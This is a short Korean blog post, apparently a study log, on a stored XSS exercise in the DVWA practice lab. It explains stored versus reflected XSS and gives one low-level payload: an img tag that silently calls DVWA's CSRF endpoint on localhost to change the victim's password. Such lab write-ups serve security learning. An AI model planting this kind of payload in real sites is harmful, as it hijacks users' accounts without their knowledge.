Security
[DVWA] 웹 모의해킹 실습 (Stored XSS)
YEJI ⍢
2022. 7. 30. 01:59
728x90
Stored XSS 란 ? ? ?
웹 브라우저 스크립트를 실행하는 것은 Reflected XSS 공격과 동일하지만,
웹 서버에 스크립트를 저장했다가 실행된다는 차이점이 있습니다.
Stored XSS - Low level
$ <img src="http://localhost/dvwa/vulnerabilities/csrf/?password_new=1111&password_conf=1111&Change=Change">
◡̈